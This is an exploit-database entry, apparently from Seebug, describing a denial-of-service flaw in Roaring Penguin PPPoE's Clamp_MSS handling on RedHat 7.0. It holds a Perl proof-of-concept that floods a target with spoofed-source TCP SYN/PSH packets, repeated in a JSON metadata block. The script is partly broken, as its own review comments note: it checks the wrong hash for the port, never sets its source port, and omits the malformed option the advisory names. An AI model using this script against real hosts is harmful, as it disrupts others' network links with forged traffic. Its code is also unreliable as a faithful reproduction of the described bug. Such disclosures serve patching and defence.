RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service Vulnerability
2014-07-01T00:00:00
ID SSV:74369 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/2098/info
Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.
PPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE receives a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the PPP connection being supported by PPPoE will time out and be terminated. A manual restart is needed to regain functionality.
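This bug has been fixed by Roaring Penguin Software in a new version; see the solutions section of the source advisory. As described above, the vulnerable code path is reached only when the Clamp_MSS option is in use.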
#!/usr/bin/perl
# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0.
# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html
# by dethy
use Net::RawIP;
use Getopt::Std;
# Command-line handling via Getopt::Std: -d destination address, -s source
# address, -p destination port, -c packet count. In the spec string only
# d, s and p carry a trailing colon; c is declared as a plain switch.
getopts('d:s:p:c',\%args) || &usage;
# -d is mandatory: without it the script exits through usage().
if(defined($args{d})){$daddr=$args{d};}else{&usage;}
# -s is optional: when absent, randsrc() supplies a random dotted quad, so
# the source address seen by the receiver is forged and is not a reliable
# indicator for filtering or attribution.
if(defined($args{s})){$src=$args{s};}else{$src=&randsrc;}
# NOTE(review): this test consults %port, while getopts() above fills %args;
# nothing in this listing populates %port, so the usage() branch is taken.
if(defined($port{p})){$port=$args{p};}else{&usage;}
# Number of packets to send; falls back to 10 when -c is not given.
if(defined($args{c})){$count=$args{c};}else{$count=10;}
# Pick a pseudo-random integer in 0..65509, store it in the global $sport
# and return it. The generator is reseeded on every call.
sub randport() {
    srand;
    $sport = int(rand(65510));
    return $sport;
}
# Produce a random dotted-quad string (each octet in 0..254), store it in
# the global $saddr and return it. The generator is reseeded on every call.
# The result is used as a forged source address, so it carries no
# information about the real sender.
sub randsrc() {
    srand;
    $saddr = join(".", map { int(rand(255)) } 1 .. 4);
    return $saddr;
}
# Build a single IPv4/TCP packet object with Net::RawIP.
# NOTE(review): raw packet construction normally needs elevated privileges;
# nothing in this listing checks for them.
$packet = new Net::RawIP({ip=>{},tcp=>{}});
# IP header: source from -s or randsrc(), destination from -d, TOS 3.
# TCP header: SYN and PSH set together, destination port from $port.
# $sport is only ever assigned inside randport(), which this listing never
# calls. No TCP option bytes are set in this call, so the "zero-length
# option" named in the advisory text is not visible here; detection should
# follow the advisory's description rather than this script's header values.
$packet->set({ ip => { saddr => $src,
daddr => $daddr,
tos => 3 },
tcp => { source => $sport,
dest => $port,
syn => 1, psh => 1 } });
# Send the packet $count times; the first argument (0) is the delay that
# Net::RawIP's send() waits between transmissions.
$packet->send(0,$count);
# Abort the script with a two-line banner and option synopsis.
sub usage() {
    my $message = "pppoe-link POC DoS on RH7\n$0 -d <dest> -s <source> -p <port> -c <count>\n";
    die $message;
}
{"lastseen": "2017-11-19T15:27:58", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2017-11-19T15:27:58", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T15:27:58", "rev": 2}, "vulnersScore": -0.5}, "href": "https://www.seebug.org/vuldb/ssvid-74369", "references": [], "enchantments_done": [], "id": "SSV:74369", "title": "RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n source: http://www.securityfocus.com/bid/2098/info\r\n\r\nRoaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.\r\n\r\nPPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE recieves a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the ppp connection being supported by PPPoE will time out and be terminated. A manual re-start is needed to regain functionality.\r\n\r\nThis bug has been fixed by Roaring Penguin Software in a new version, see the solutions section. 
\r\n\r\n#!/usr/bin/perl\r\n# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0.\r\n# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html\r\n# by dethy\r\nuse Net::RawIP;\r\nuse Getopt::Std;\r\ngetopts('d:s:p:c',\\%args) || &usage;\r\nif(defined($args{d})){$daddr=$args{d};}else{&usage;}\r\nif(defined($args{s})){$src=$args{s};}else{$src=&randsrc;}\r\nif(defined($port{p})){$port=$args{p};}else{&usage;}\r\nif(defined($args{c})){$count=$args{c};}else{$count=10;}\r\n\r\nsub randport(){\r\n srand;\r\n return $sport=(int rand 65510); \r\n }\r\n\r\nsub randsrc(){\r\n srand; \r\n return $saddr=(int rand 255).".".(int rand 255).".".(int rand 255).".".(int rand 255); \r\n }\r\n\r\n $packet = new Net::RawIP({ip=>{},tcp=>{}});\r\n $packet->set({ ip => { saddr => $src, \r\n\t\t\tdaddr => $daddr, \r\n\t\t\ttos => 3 },\r\n tcp => { source => $sport, \r\n\t\t\tdest => $port,\r\n syn => 1, psh => 1 } });\r\n\r\n $packet->send(0,$count);\r\n\r\nsub usage(){ die("pppoe-link POC DoS on RH7\\n$0 -d <dest> -s <source> -p <port> -c <count>\\n"); }\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-74369", "type": "seebug", "immutableFields": []}